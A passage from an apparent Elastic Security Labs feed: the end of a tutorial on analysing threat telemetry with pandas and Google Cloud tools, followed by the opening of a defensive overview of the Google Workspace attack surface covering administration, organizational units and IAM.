Example visualization of malware distribution scores by family from an example dataset</p>
<p><strong>Why this matters:</strong> Visualization transforms abstract data into tangible insights. It offers a perspective that's both holistic and granular, depending on the need.</p>
<p><strong>Key library:</strong> Seaborn, built atop Matplotlib, excels at turning data into visual stories.</p>
<h3>Machine learning – The advanced guard:</h3>
<p>When traditional methods are insufficient, machine learning steps in, offering a predictive lens to anomalies. While many algorithms are designed to classify known patterns, some, like autoencoders in deep learning, learn to recreate 'normal' data, marking any deviation as an anomaly.</p>
<p><strong>Why this matters:</strong> As data complexity grows, the boundaries of what constitutes an anomaly become blurrier. Machine learning offers adaptive solutions that evolve with the data.</p>
<p><strong>Key libraries:</strong> <a href="https://scikit-learn.org/stable/">Scikit-learn</a> is a treasure trove for user-friendly, classical machine learning techniques, while <a href="https://pytorch.org/">PyTorch</a> brings the power of deep learning to the table.</p>
<p>Perfecting anomaly detection in data analysis is similar to refining a complex skill through practice and iteration. The process often involves trial and error, with each iteration enhancing the analyst's familiarity with the dataset. This progressive understanding is key to ensuring that the final analysis is both robust and insightful. In data analysis, the journey of exploration and refinement is as valuable as the final outcome itself.</p>
<p>Before proceeding to in-depth trend analysis, it's very important to ensure that the data is thoroughly pre-processed and transformed. Just as precision and reliability are essential in any meticulous task, they are equally critical in data analysis. The steps of cleaning, normalizing, enriching, and removing anomalies form the groundwork for deriving meaningful insights. Without these careful preparations, the analysis could range from slightly inaccurate to significantly misleading. It's only when the data is properly refined and free of distortions that it can reveal its true value, leading to reliable and actionable insights in trend analysis.</p>
<h1>Trend analysis: Unveiling patterns in data</h1>
<p>In the dynamic field of cybersecurity where threat actors continually evolve their tactics, techniques, and procedures (TTPs), staying ahead of emerging threats is critical. Trend analysis serves as a vital tool in this regard, offering a way to identify and understand patterns and behaviors in cyber threats over time.</p>
<p>By utilizing the MITRE ATT&amp;CK framework, cybersecurity professionals have a structured and standardized approach to analyzing and categorizing these evolving threats. This framework aids in systematically identifying patterns in attack methodologies, enabling defenders to anticipate and respond to changes in adversary behaviors effectively.</p>
<p>Trend analysis, through the lens of the MITRE ATT&amp;CK framework, transforms raw cybersecurity telemetry into actionable intelligence. It allows analysts to track the evolution of attack strategies and to adapt their defense mechanisms accordingly, ensuring a proactive stance in cybersecurity management.</p>
<h2>Beginning with a broad overview: Aggregation and sorting</h2>
<p>Commencing our analysis with a bird's eye view is paramount. This panoramic perspective allows us to first pinpoint the broader tactics in play before delving into the more granular techniques and underlying detection rules.</p>
<p><strong>Top tactics:</strong> By aggregating our data based on MITRE ATT&amp;CK tactics, we can discern the overarching strategies adversaries lean toward. This paints a picture of their primary objectives, be it initial access, execution, or exfiltration.</p>
<pre><code>top_tactics = df.groupby('mitre_tactic').size().sort_values(ascending=False)
</code></pre>
<p><strong>Zooming into techniques:</strong> Once we've identified a prominent tactic, we can then funnel our attention to the techniques linked to that tactic. This reveals the specific modus operandi of adversaries.</p>
<pre><code>chosen_tactic = 'Execution'

techniques_under_tactic = df[df['mitre_tactic'] == chosen_tactic]
top_techniques = techniques_under_tactic.groupby('mitre_technique').size().sort_values(ascending=False)
</code></pre>
<p><strong>Detection rules and logic:</strong> With our spotlight on a specific technique, it's time to delve deeper, identifying the detection rules that triggered alerts. This not only showcases what was detected, but by reviewing the detection logic, we also gain an understanding of the precise behaviors and patterns that were flagged.</p>
<pre><code>chosen_technique = 'Scripting'

rules_for_technique = techniques_under_tactic[techniques_under_tactic['mitre_technique'] == chosen_technique]

top_rules = rules_for_technique.groupby('detection_rule').size().sort_values(ascending=False)
</code></pre>
<p>This hierarchical, cascading approach is akin to peeling an onion. With each layer, we expose more intricate details, refining our perspective and sharpening our insights.</p>
<h2>The power of time: Time series analysis</h2>
<p>In the realm of cybersecurity, time isn't just a metric; it's a narrative. Timestamps, often overlooked, are goldmines of insights. Time series analysis allows us to plot events over time, revealing patterns, spikes, or lulls that might be indicative of adversary campaigns, specific attack waves, or dormancy periods.</p>
<p>For instance, plotting endpoint malware alerts over time can unveil an adversary's operational hours or spotlight a synchronized, multi-vector attack:</p>
<pre><code>import matplotlib.pyplot as plt

# Extract and plot endpoint alerts over time
df.set_index('timestamp')['endpoint_alert'].resample('D').count().plot()
plt.title('Endpoint Malware Alerts Over Time')
plt.xlabel('Time')
plt.ylabel('Alert Count')
plt.show()
</code></pre>
<p>Time series analysis doesn't just highlight &quot;when&quot; but often provides insights into the &quot;why&quot; behind certain spikes or anomalies. It aids in correlating external events (like the release of a new exploit) to internal data trends.</p>
<h2>Correlation analysis</h2>
<p>Understanding relationships between different sets of data can offer valuable insights. For instance, a spike in one type of alert could correlate with another type of activity in the system, shedding light on multi-stage attack campaigns or diversion strategies.</p>
<pre><code># Finding correlation between an increase in login attempts and data exfiltration activities
correlation_value = df['login_attempts'].corr(df['data_exfil_activity'])
</code></pre>
<p>This analysis, with the help of pandas <a href="https://pandas.pydata.org/docs/reference/api/pandas.DataFrame.corr.html">corr</a>, can help in discerning whether multiple seemingly isolated activities are part of a coordinated attack chain.</p>
<p>Correlation also does not have to be metric-driven either. When analyzing threats, it is easy to find value and new insights by comparing older findings to the new ones.</p>
<h2>Machine learning &amp; anomaly detection</h2>
<p>With the vast volume of data, manual analysis becomes impractical. Machine learning can assist in identifying patterns and anomalies that might escape the human eye. Algorithms like <a href="https://scikit-learn.org/stable/modules/generated/sklearn.ensemble.IsolationForest.html">Isolation Forest</a> or <a href="https://scikit-learn.org/stable/modules/neighbors.html">k-nearest neighbors</a> (KNN) are commonly used to spot deviations or clusters of related data points.</p>
<pre><code>from sklearn.ensemble import IsolationForest

# Assuming 'feature_set' contains relevant metrics for analysis
clf = IsolationForest(contamination=0.05)
anomalies = clf.fit_predict(feature_set)
</code></pre>
<p>Here, the anomalies variable will flag data points that deviate from the norm, helping analysts pinpoint unusual behavior swiftly.</p>
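<p>As a follow-up, here is a minimal sketch (over a hypothetical feature set of daily alert metrics) showing how the -1/1 labels returned by fit_predict can be used to slice out the flagged rows:</p>
<pre><code>import pandas as pd
from sklearn.ensemble import IsolationForest

# Hypothetical feature set: daily alert volume and distinct hosts seen
feature_set = pd.DataFrame({
    'alert_count': [12, 9, 11, 10, 250, 13],
    'distinct_hosts': [3, 2, 3, 3, 40, 2],
})

clf = IsolationForest(contamination=0.2, random_state=0)
labels = clf.fit_predict(feature_set)

# fit_predict returns -1 for anomalies and 1 for inliers, so the
# labels can slice the original frame down to the outlier days
anomalous_days = feature_set[labels == -1]
</code></pre>
<p>The flagged rows then become a starting point for triage rather than an end result; the anomaly is a lead, not a verdict.</p>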
<h2>Behavioral patterns &amp; endpoint data analysis</h2>
<p>Analyzing endpoint behavioral data collected from detection rules allows us to unearth overarching patterns and trends that can be indicative of broader threat landscapes, cyber campaigns, or evolving attacker TTPs.</p>
<p><strong>Tactic progression patterns:</strong> By monitoring the sequence of detected behaviors over time, we can spot patterns in how adversaries move through their attack chain. For instance, if there's a consistent trend where initial access techniques are followed by execution and then lateral movement, it's indicative of a common attacker playbook being employed.</p>
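<p>This kind of sequence analysis can be sketched with pandas; the column names below are hypothetical:</p>
<pre><code>import pandas as pd

# Hypothetical alert data: one row per detection, per host
alerts = pd.DataFrame({
    'host': ['h1', 'h1', 'h1', 'h2', 'h2'],
    'timestamp': pd.to_datetime([
        '2023-01-01 09:00', '2023-01-01 09:05', '2023-01-01 09:30',
        '2023-01-02 14:00', '2023-01-02 14:20',
    ]),
    'tactic': ['initial-access', 'execution', 'lateral-movement',
               'initial-access', 'execution'],
})

# Order each host's alerts chronologically, then join the tactics
# into a single arrow-delimited chain per host
chains = (alerts.sort_values('timestamp')
          .groupby('host')['tactic']
          .agg(' -> '.join))

# Counting identical chains across hosts surfaces repeated playbooks
top_chains = chains.value_counts()
</code></pre>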
<p><strong>Command-line trend analysis:</strong> Even within malicious command-line arguments, certain patterns or sequences can emerge. Monitoring the most frequently detected malicious arguments can give insights into favored attack tools or scripts.</p>
<p>Example:</p>
<pre><code># Most frequently detected malicious command lines
top_malicious_commands = (df.groupby('malicious_command_line').size()
                          .sort_values(ascending=False).head(10))
</code></pre>
<p><strong>Process interaction trends:</strong> While individual parent-child process relationships can be malicious, spotting trends in these interactions can hint at widespread malware campaigns or attacker TTPs. For instance, if a large subset of endpoints is showing the same unusual process interaction, it might suggest a common threat.</p>
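<p>One way to quantify this (assuming hypothetical parent/child process columns) is to count how many distinct hosts exhibit each parent-child pair:</p>
<pre><code>import pandas as pd

# Hypothetical process event data with parent/child relationships
events = pd.DataFrame({
    'host': ['h1', 'h2', 'h3', 'h1'],
    'parent_process': ['winword.exe', 'winword.exe', 'winword.exe',
                       'explorer.exe'],
    'child_process': ['powershell.exe', 'powershell.exe', 'powershell.exe',
                      'chrome.exe'],
})

# For each parent/child pair, count the distinct hosts it appears on;
# the same unusual interaction across many endpoints hints at a
# shared threat or campaign rather than an isolated incident
pair_spread = (events.groupby(['parent_process', 'child_process'])['host']
               .nunique()
               .sort_values(ascending=False))
</code></pre>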
<p><strong>Temporal behavior patterns:</strong> Just as with other types of data, the temporal aspect of endpoint behavioral data can be enlightening. Analyzing the frequency and timing of certain malicious behaviors can hint at attacker operational hours or campaign durations.</p>
<p>Example:</p>
<pre><code># Analyzing frequency of a specific malicious behavior over time
monthly_data = df.pivot_table(index='timestamp', columns='tactic', values='count', aggfunc='sum').resample('M').sum()

ax = monthly_data[['execution', 'defense-evasion']].plot(kind='bar', stacked=False, figsize=(12,6))

plt.title(&quot;Frequency of 'execution' and 'defense-evasion' Tactics Over Time&quot;)

plt.ylabel(&quot;Count&quot;)
ax.set_xticklabels([x.strftime('%B-%Y') for x in monthly_data.index])
plt.xticks(rotation=45)
plt.tight_layout()
plt.show()
</code></pre>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-cloud-for-cyber-data-analytics/image11.png" alt="Note: This image is from example data and not from the Global Threat Report" />
Note: This image is from example data and not from the Global Threat Report</p>
<p>By aggregating and analyzing endpoint behavioral data at a macro level, we don't just identify isolated threats but can spot waves, trends, and emerging patterns. This broader perspective empowers cybersecurity teams to anticipate, prepare for, and counter large-scale cyber threats more effectively.</p>
<p>While these are some examples of how to perform trend analysis, there is no right or wrong approach. Every analyst has their own preference or set of questions they or stakeholders may want to ask. Here are some additional questions or queries analysts may have for cybersecurity data when doing trend analysis.</p>
<ul>
<li>What are the top three tactics being leveraged by adversaries this quarter?</li>
<li>Which detection rules are triggering the most, and is there a common thread?</li>
<li>Are there any time-based patterns in endpoint alerts, possibly hinting at an adversary's timezone?</li>
<li>How have cloud alerts evolved with the migration of more services to the cloud?</li>
<li>Which malware families are becoming more prevalent, and what might be the cause?</li>
<li>Do the data patterns suggest any seasonality, like increased activities towards year-end?</li>
<li>Are there correlations between external events and spikes in cyber activities?</li>
<li>How does the weekday data differ from weekends in terms of alerts and attacks?</li>
<li>Which organizational assets are most targeted, and are their defenses up-to-date?</li>
<li>Are there any signs of internal threats or unusual behaviors among privileged accounts?</li>
</ul>
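<p>Many of these questions reduce to a short grouping. For instance, the weekday-versus-weekend comparison can be sketched as follows, over a hypothetical alert frame with a timestamp column:</p>
<pre><code>import pandas as pd

# Hypothetical alert frame with one timestamp per alert
df = pd.DataFrame({'timestamp': pd.to_datetime([
    '2023-05-01', '2023-05-02', '2023-05-03',  # Mon-Wed
    '2023-05-06', '2023-05-07',                # Sat-Sun
])})

# dayofweek: Monday=0 ... Sunday=6, so values of 5 and 6 are weekends
df['is_weekend'] = df['timestamp'].dt.dayofweek >= 5
alerts_by_daytype = df.groupby('is_weekend').size()
</code></pre>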
<p>Trend analysis in cybersecurity is a dynamic process. While we've laid down some foundational techniques and questions, there are myriad ways to approach this vast domain. Each analyst may have their preferences, tools, and methodologies, and that's perfectly fine. The essence lies in continuously evolving and adapting our approach while staying aware of the ever-changing threat landscape of each ecosystem exposed to threats.</p>
<h1>Reduction: Streamlining for clarity</h1>
<p>Having progressed through the initial stages of our data analysis, we now enter the next phase: reduction. This step is about refining and concentrating our comprehensive data into a more digestible and focused format.</p>
<p>Recap of the Analysis Journey So Far:</p>
<ul>
<li><strong>Extraction:</strong> The initial phase involved setting up our Google Cloud environment and selecting relevant datasets for our analysis.</li>
<li><strong>Pre-processing and transformation:</strong> At this stage, the data was extracted, processed, and transformed within our Colab notebooks, preparing it for detailed analysis.</li>
<li><strong>Trend analysis:</strong> This phase provided in-depth insights into cyber attack tactics, techniques, and malware, forming the core of our analysis.</li>
</ul>
<p>While the detailed data in our Colab Notebooks is extensive and informative for an analyst, it might be too complex for a broader audience. Therefore, the reduction phase focuses on distilling this information into a more concise and accessible form. The aim is to make the findings clear and understandable, ensuring that they can be effectively communicated and utilized across various departments or stakeholders.</p>
<h2>Selecting and aggregating key data points</h2>
<p>In order to effectively communicate our findings, we must tailor the presentation to the audience's needs. Not every stakeholder requires the full depth of collected data; many prefer a summarized version that highlights the most actionable points. This is where data selection and aggregation come into play, focusing on the most vital elements and presenting them in an accessible format.</p>
<p>Here's an example of how to use Pandas to aggregate and condense a dataset, focusing on key aspects of endpoint behavior:</p>
<pre><code>required_endpoint_behavior_cols = ['rule_name', 'host_os_type', 'tactic_name', 'technique_name']

# Aggregate alert counts by rule, OS, tactic, and technique
reduced_behavior_df = (df.groupby(required_endpoint_behavior_cols).size()
                       .reset_index(name='count')
                       .sort_values(by='count', ascending=False)
                       .reset_index(drop=True))

columns = {
    'rule_name': 'Rule Name',
    'host_os_type': 'Host OS Type',
    'tactic_name': 'Tactic',
    'technique_name': 'Technique',
    'count': 'Alerts'
}

reduced_behavior_df = reduced_behavior_df.rename(columns=columns)
</code></pre>
<p>One remarkable aspect of this code and process is the flexibility it offers. For instance, we can group our data by various data points tailored to our needs. Interested in identifying popular tactics used by adversaries? Group by the MITRE ATT&amp;CK tactic. Want to shed light on masquerading malicious binaries? Revisit extraction to add more Elastic Common Schema (ECS) fields such as file path, filter on Defense Evasion, and aggregate to reveal the commonly trodden paths. This approach ensures we create datasets that are both enlightening and not overwhelmingly rich, tailor-made for stakeholders who wish to understand the origins of our analysis.</p>
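<p>As a sketch of the Defense Evasion example above (the ECS-style column names here are hypothetical), filtering on the tactic and aggregating by file path looks like this:</p>
<pre><code>import pandas as pd

# Hypothetical ECS-style alert frame
df = pd.DataFrame({
    'tactic_name': ['defense-evasion', 'defense-evasion', 'execution'],
    'file_path': ['C:/Users/Public/svchost.exe',
                  'C:/Users/Public/svchost.exe',
                  'C:/Tools/run.ps1'],
})

# Filter to Defense Evasion, then count the file paths involved to
# reveal commonly abused locations for masquerading binaries
evasion_paths = (df[df['tactic_name'] == 'defense-evasion']
                 .groupby('file_path').size()
                 .sort_values(ascending=False))
</code></pre>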
<p>This process involves grouping the data by relevant categories such as rule name, host OS type, and MITRE ATT&amp;CK tactics and techniques and then counting the occurrences. This method helps in identifying the most prevalent patterns and trends in the data.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-cloud-for-cyber-data-analytics/image5.png" alt="Diagram example of data aggregation to obtain reduced dataset" />
Diagram example of data aggregation to obtain reduced dataset</p>
<h2>Exporting reduced data to Google Sheets for accessibility</h2>
<p>The reduced data, now stored as a dataframe in memory, is ready to be exported. We use Google Sheets as the platform for sharing these insights because of its wide accessibility and user-friendly interface. The process of exporting data to Google Sheets is straightforward and efficient, thanks to the integration with Google Cloud services.</p>
<p>Here's an example of how the data can be uploaded to Google Sheets using Python from our Colab notebook:</p>
<pre><code>from google.colab import auth
import google.auth
import gspread
from gspread_dataframe import set_with_dataframe

# Authenticate the Colab session and authorize gspread with the
# resulting application default credentials
auth.authenticate_user()
credentials, project = google.auth.default()
gc = gspread.authorize(credentials)

workbook = gc.open_by_key(&quot;SHEET_ID&quot;)
behavior_sheet_name = 'NAME_OF_TARGET_SHEET'
endpoint_behavior_worksheet = workbook.worksheet(behavior_sheet_name)
set_with_dataframe(endpoint_behavior_worksheet, reduced_behavior_df)
</code></pre>
<p>With a few simple lines of code, we have effectively transferred our data analysis results to Google Sheets. This approach is widely used due to its accessibility and ease of use. However, there are multiple other methods to present data, each suited to different requirements and audiences. For instance, some might opt for a platform like <a href="https://cloud.google.com/looker?hl=en">Looker</a> to present the processed data in a more dynamic dashboard format. This method is particularly useful for creating interactive and visually engaging presentations of data. It ensures that even stakeholders who may not be familiar with the technical aspects of data analysis, such as those working in Jupyter Notebooks, can easily understand and derive value from the insights.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-cloud-for-cyber-data-analytics/image7.png" alt="Results in Google Sheet" /></p>
<p>This streamlined process of data reduction and presentation can be applied to different types of datasets, such as cloud SIEM alerts, endpoint behavior alerts, or malware alerts. The objective remains the same: to simplify and concentrate the data for clear and actionable insights.</p>
<h1>Presentation: Showcasing the insights</h1>
<p>After meticulously refining our datasets, we now focus on the final stage: the presentation. Here we take our datasets, now neatly organized in platforms like Google Sheets or Looker, and transform them into a format that is both informative and engaging.</p>
<h2>Pivot tables for in-depth analysis</h2>
<p>Using pivot tables, we can create a comprehensive overview of our trend analysis findings. These tables allow us to display data in a multi-dimensional manner, offering insights into various aspects of cybersecurity, such as prevalent MITRE ATT&amp;CK tactics, chosen techniques, and preferred malware families.</p>
<p>Our approach to data visualization involves:</p>
<ul>
<li><strong>Broad overview with MITRE ATT&amp;CK tactics:</strong> Starting with a general perspective, we use pivot tables to overview the different tactics employed in cyber threats.</li>
<li><strong>Detailed breakdown:</strong> From this panoramic view, we delve deeper, creating separate pivot tables for each popular tactic and then branching out into detailed analyses for each technique and specific detection rule.</li>
</ul>
<p>This methodical process helps to uncover the intricacies of detection logic and alerts, effectively narrating the story of the cyber threat landscape.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-cloud-for-cyber-data-analytics/image1.png" alt="Diagram showcasing aggregations funnel into contextual report information" />
Diagram showcasing aggregations funnel into contextual report information</p>
<p><strong>Accessibility across audiences:</strong> Our data presentations are designed to cater to a wide range of audiences, from those deeply versed in data science to those who prefer a more straightforward understanding. The Google Workspace ecosystem facilitates the sharing of these insights, allowing pivot tables, reduced datasets, and other elements to be easily accessible to all involved in the report-making process.</p>
<p><strong>Integrating visualizations into reports:</strong> When crafting a report, for example, in Google Docs, the integration of charts and tables from Google Sheets is seamless. This integration ensures that any modifications in the datasets or pivot tables are easily updated in the report, maintaining the efficiency and coherence of the presentation.</p>
<p><strong>Tailoring the presentation to the audience:</strong> The presentation of data insights is not just about conveying information; it's about doing so in a visually appealing and digestible manner. For a more tech-savvy audience, an interactive Colab Notebook with dynamic charts and functions may be ideal. In contrast, for marketing or design teams, a well-designed dashboard in Looker might be more appropriate. The key is to ensure that the presentation is clear, concise, and visually attractive, tailored to the specific preferences and needs of the audience.</p>
<h1>Conclusion: Reflecting on the data analysis journey</h1>
<p>As we conclude, it's valuable to reflect on the territory we've navigated in analyzing cyber threat data. This journey involved several key stages, each contributing significantly to our final insights.</p>
<h2>Journey through Google's Cloud ecosystem</h2>
<p>Our path took us through several Google Cloud services, including GCP, GCE, Colab Notebooks, and Google Workspace. Each played a pivotal role:</p>
<ul>
<li><strong>Data exploration:</strong> We began with a set of cyber-related questions we wanted to answer and explored the vast datasets available to us. In this blog, we focused solely on telemetry available in BigQuery.</li>
<li><strong>Data extraction:</strong> We began by extracting raw data, utilizing BigQuery to efficiently handle large volumes of data. Extraction occurred both in BigQuery and from within our Colab notebooks.</li>
<li><strong>Data wrangling and processing:</strong> The power of Python and the pandas library was leveraged to clean, aggregate, and refine this data, much like a chef skillfully preparing ingredients.</li>
<li><strong>Trend analysis:</strong> We then performed trend analysis on our reformed datasets with several methodologies to glean valuable insights into adversary tactics, techniques, and procedures over time.</li>
<li><strong>Reduction:</strong> Off the back of our trend analysis, we aggregated our different datasets by targeted data points in preparation for presentation to stakeholders and peers.</li>
<li><strong>Transition to presentation:</strong> The ease of moving from data analytics to presentation within a web browser highlighted the agility of our tools, facilitating a seamless workflow.</li>
</ul>
<h2>Modularity and flexibility in workflow</h2>
<p>An essential aspect of our approach was the modular nature of our workflow. Each phase, from data extraction to presentation, featured interchangeable components in the Google Cloud ecosystem, allowing us to tailor the process to specific needs:</p>
<ul>
<li><strong>Versatile tools:</strong> Google Cloud Platform offered a diverse range of tools and options, enabling flexibility in data storage, analysis, and presentation.</li>
<li><strong>Customized analysis path:</strong> Depending on the specific requirements of our analysis, we could adapt and choose different tools and methods, ensuring a tailored approach to each dataset.</li>
<li><strong>Authentication and authorization:</strong> Because our entities were housed in the Google Cloud ecosystem, access to different tools, sites, data, and more was painless, ensuring a smooth transition between services.</li>
</ul>
<h2>Orchestration and tool synchronization</h2>
<p>The synergy between our technical skills and the chosen tools was crucial. This harmonization ensured that the analytical process was not only effective for this project but also set the foundation for more efficient and insightful future analyses. The tools were used to augment our capabilities, keeping the focus on deriving meaningful insights rather than getting entangled in technical complexities.</p>
<p>In summary, this journey through data analysis emphasized the importance of a well-thought-out approach, leveraging the right tools and techniques, and the adaptability to meet the demands of cyber threat data analysis. The end result is not just a set of findings but a refined methodology that can be applied to future data analysis endeavors in the ever-evolving field of cybersecurity.</p>
<h1>Call to Action: Embarking on your own data analytics journey</h1>
<p>Your analytical workspace is ready! What innovative approaches or experiences with Google Cloud or other data analytics platforms can you bring to the table? The realm of data analytics is vast and varied, and although each analyst brings a unique touch, the underlying methods and principles are universal.</p>
<p>The objective is not solely to excel in your current analytical projects but to continually enhance and adapt your techniques. This ongoing refinement ensures that your future endeavors in data analysis will be even more productive, enlightening, and impactful. Dive in and explore the world of data analytics with Google Cloud!</p>
<p>We encourage any feedback and engagement for this topic! If you prefer to do so, feel free to engage us in Elastic’s public <a href="https://elasticstack.slack.com/archives/C018PDGK6JU">#security</a> Slack channel.</p>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/es/security-labs/assets/images/google-cloud-for-cyber-data-analytics/photo-edited-12.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[Google Workspace Attack Surface]]></title>
            <link>https://www.elastic.co/es/security-labs/google-workspace-attack-surface-part-one</link>
            <guid>google-workspace-attack-surface-part-one</guid>
            <pubDate>Tue, 03 Jan 2023 00:00:00 GMT</pubDate>
            <description><![CDATA[During this multipart series, we’ll help you understand what GW is and some of the common risks to be aware of, while encouraging you to take control of your enterprise resources.]]></description>
            <content:encoded><![CDATA[<h1>Preamble</h1>
<p>Formerly known as GSuite, Google Workspace (GW) is a collection of enterprise tools offered by Google. Popular services such as Google Drive, Gmail and Google Forms are used by many small and midsize businesses (SMBs), as well as larger organizations.</p>
<p>In security conversations, GW is often mentioned because a threat is abusing or targeting its services and resources. As practitioners, it is essential that we consider the associated risks and plan defenses accordingly. Importantly, Microsoft and Amazon offer some of the same services: if there’s a “least risk” option among them, we haven’t seen evidence of it yet, and each prioritizes its own form of visibility.</p>
<p>During this multipart series, we’ll help you understand what GW is and some of the common risks to be aware of, while encouraging you to take control of your enterprise resources:</p>
<ul>
<li>Part One - Surveying the Land</li>
<li>Part Two - Setup Threat Detection with Elastic</li>
<li>Part Three - Detecting Common Threats</li>
</ul>
<p>In this publication, readers will learn more about common resources and services in GW and how these are targeted by threats. This will provide an overview of administration, organizational structures, identity access and management (IAM), developer resources, and a few other topics you should think about.</p>
<p>But before we begin, let’s highlight the importance of organizations also taking ownership of this attack surface. If you’re using these enterprise tools and don’t consider them part of your enterprise, that is the challenge to overcome first. Know where your visibility extends to, know which capabilities you can exercise within that range, and don’t mistake vendor-operated for vendor-secured.</p>
<h1>Common Services Targeted by Threats</h1>
<p><a href="https://workspace.google.com/features/">Services and applications</a> available in GW include cloud storage, email, identity and access management (IAM), chat and much more. Behind the scenes, <a href="https://developers.google.com/workspace">developers</a> can access application programming interfaces (APIs) to interact programmatically with GW. Together, these services allow organizations of all sizes to provide users with their own Internet-accessible virtual “workspace”. However, threat actors have discovered trivial and advanced methods to abuse these services. While there is plenty of information to cover, we should start with administration as it provides an overview of GW and will help set the stage for more in-depth context about applications or developer resources.</p>
<h2>Administration</h2>
<p>Few GW users are aware of the admin console or the settings it exposes, unless they happen to also be an administrator. The admin console is the central command center for GW administrators to manage the services and resources of their organization. An “organization” maps directly to the primary domain registered with GW and is therefore the root node of the GW hierarchy. Only user accounts with administrative roles can sign in and access their organization’s admin console.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-one/image1.jpg" alt="Snippet of GW home page" /></p>
<p>GW employs a directory service-like structure that defines users, groups, organizational units (OUs), roles and other attributes of the enterprise for easy navigation. While the admin console is not inherently a risk, compromised valid accounts (<a href="https://attack.mitre.org/techniques/T1078/004/">T1078.004</a>) with that level of privilege expose organizations to greater risk.</p>
<p>Aside from IAM, administrators use the admin console to manage applications available to their organization, the most popular being Gmail, Drive and Docs, Google Meet, Google Forms, Google Sheets, and Calendar. Additional Google services can be added, though most, such as Chrome Remote Desktop, are enabled by default when setting up GW. Depending on the OU configuration, permissions for users to these applications may be inherited from the root OU. The principle of least privilege (PoLP) and application control are critical to reducing organizational risk within GW.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-one/image6.png" alt="Snippet of GW Applications and Inheritance" /></p>
<p>Administrators can also manage mobile and endpoint device enrollment, as well as network related settings from the admin console. Administrators can add devices by uploading a CSV containing the serial number, which can be assigned to a user. For corporate-owned devices, this provides convenient auditing that may unfortunately become necessary. Universal settings for mobile devices are also available, allowing data and setting synchronization for iOS, Android and Google devices. GW allows mobile device management (MDM), allowing admins to apply local changes using <a href="https://learn.microsoft.com/en-us/troubleshoot/mem/intune/deploy-oma-uris-to-target-csp-via-intune">Open Mobile Alliance - Uniform Resources</a> (OMA-URIs).</p>
<p>Coincidentally, making changes to remote enterprise endpoints is also a popular goal of adversaries.</p>
<p>GW admins have the capability to create and manage Wi-Fi, Ethernet, VPN and Cellular networks. For cellular devices this is typically done via the Subscription Management Root-Discovery Service (SM-DP) which is used to connect eSIM devices to a mobile network. VPN and proxy settings can be configured as well with routing through Google’s DNS infrastructure by default or custom routing if chosen.</p>
<p>Windows endpoints can also be managed via GW, with the capability to modify settings and synchronize data with Active Directory (AD) or an existing LDAP server. This is accomplishable with GW’s <a href="https://support.google.com/a/answer/106368?hl=en">Google Cloud Directory Sync</a> (GCDS). Settings can be applied to each endpoint, such as BitLocker, automatic updates or authentication via <a href="https://support.google.com/a/answer/9250996?hl=en">Google Credential Provider for Windows</a> (GCPW). GCPW allows users to login to a Windows endpoint with their Google account for authentication. Users with sufficient privileges can make changes to remote enterprise endpoints by configuring a <a href="https://support.google.com/a/answer/10181140#zippy=%2Cwindows-device-management%2Ccustom-settings">custom policy</a> through the configuration service provider (CSP). This is possible with the Windows 10 enterprise platform, which exposes endpoint configuration settings that allow GW, as a MDM service to read, set, modify or delete configuration settings. Microsoft has an <a href="https://learn.microsoft.com/en-us/windows/configuration/provisioning-packages/how-it-pros-can-use-configuration-service-providers#a-href-idbkmk-csp-docahow-do-you-use-the-csp-documentation">extensive list</a> of CSP settings that are exposed for management via custom policies. While integration between platforms is important to daily operations, this service equips adversaries with the capability to expand their intrusion into the Windows ecosystem.</p>
<h2>Organizational Structure</h2>
<p>The digital structure of an enterprise in GCP or GW is typically hierarchical: the registered domain is the top-level (parent, or root) node, and any organizations nested under it are used for grouping and permission scoping.</p>
<p>An important subject to understand for GW are OUs, which can be thought of as “departments” within an organization and can have subsidiary OUs. The hierarchy starts with a top-level OU, typically from the primary domain registration and organization name where child units can be added as needed. Service and application access are then inherited from the top-level OU if not specified. Users assigned to an OU will have access to any services and resources as inherited.</p>
<p>As an alternative, administrators can create and manage access groups to add an additional layer of resource-based control. Users assigned to an access group inherit the access and permissions set for the group itself, which may bypass restrictions set on the OU they are assigned to. For example, if an OU for engineering is without access to Drive and Docs, a user assigned to an access group with access to Drive and Docs can bypass the child OU settings.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-one/image7.png" alt="Diagram showing access groups with custom application access than that of the child OU" /></p>
<p>GW’s organizational structure and layered approach to access control enables administrators to scope roles easier for users. Unfortunately, incomplete or misconfigured access controls could allow unexpected permission inheritance from the top-level OU. Access restrictions could unexpectedly be bypassed by users outside their expected access groups, thus introducing insider threat risk via additional cloud roles (<a href="https://attack.mitre.org/techniques/T1098/003/">T1098.003</a>).</p>
<h2>Identity Access and Management</h2>
<h3>Identity vs Account</h3>
<p>The identity of users when using Google’s services is that of the account being used, often the email address. Identity does differ from user account slightly in that the identity of a user is unique, but the user account is a data structure keeping track of configurations, attributes, activities and more when interacting with Google’s services.</p>
<p>Standalone Gmail addresses (@gmail.com) are consumer accounts typically meant to be used by a private individual, whereas Gmail addresses with a registered domain name are managed user accounts as their lifecycle and configuration are fully managed by the organization. Therefore, when we discuss IAM in this publication, the context is typically towards managed user accounts whose identity and data is managed by the GW organization.</p>
<p>However, the relationship between identity and account does not have to be 1:1, meaning an email address, or identity, can be tied to two separate user accounts. If an organization does not enforce a new and separate identity for its users, risk looms around the private user account, whose settings are managed by the user themselves, not the organization. In this example, the widespread use of valid compromised accounts undermines the ability of defenders to identify when activity is malicious versus benign.</p>
<h3>Machine Accounts</h3>
<p>Machine accounts exist and allow developers to interact with Google services and resources programmatically. These are not managed within GW, but rather Google Cloud Platform (GCP) via the use of service accounts. A bridge exists in the form of domain-wide delegation between GW and GCP.</p>
<p>This feature authorizes GCP service accounts to access data, resources, services and much more within GW via application APIs. OAuth2 is the protocol used for authentication between GCP service accounts and GW.</p>
